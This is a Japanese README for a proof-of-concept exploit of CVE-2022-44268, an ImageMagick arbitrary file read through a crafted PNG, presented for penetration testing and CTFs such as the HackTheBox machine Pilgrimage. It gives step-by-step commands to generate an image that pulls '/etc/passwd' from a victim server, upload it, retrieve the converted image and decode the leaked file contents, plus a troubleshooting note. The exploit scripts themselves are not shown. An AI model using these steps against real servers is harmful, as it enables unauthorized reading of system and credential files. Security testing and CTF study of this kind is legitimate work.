
CVE-2022-44268の概念実証エクスプロイト。ImageMagickで処理される細工されたPNG画像を介した任意のファイル読み取りを可能にします。ペネトレーションテストとCTFチャレンジ用の生成およびデコードスクリプトが含まれています。
HTB Pilgrimageでも使用されています。
MetabaseQ の研究者は、CVE-2022-44268、すなわち ImageMagick 7.1.0-49 が情報漏洩の脆弱性を持つことを発見しました。PNG画像を(例:リサイズのために)解析すると、結果の画像に任意のリモートファイルの内容が埋め込まれる可能性があります(ImageMagick バイナリにそのファイルの読み取り権限がある場合)。
ステップ1:
実行
pip install pillow
sudo apt install graphicsmagick-imagemagick-compat
ステップ2:
実行
python3 magick_exploit.py generate -l [local_file] -o [output_file]
この例では、ローカルファイルは '/etc/passwd' で、これを被害マシンから取得したいとします。
ステップ3:
画像ファイルをウェブサイトにアップロード
ステップ4:
ウェブサイトから変換後の画像ファイルを取得します。 'downloaded_image.png' という名前で保存します。
ステップ5:
実行
python3 decode_profile.py

次のようなエラーが発生した場合
"/home/kali/codeplay/oscp/htb/machines/pilgrimage/decode_profile.py", line 8, in <module>
profile = output_str.split("Raw profile type: \n\n ")[1].split('Date:create:')[0]
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~^^^
IndexError: list index out of range
これは、指定したファイルが存在しないことを意味します。確認のために /etc/passwd を使用してください。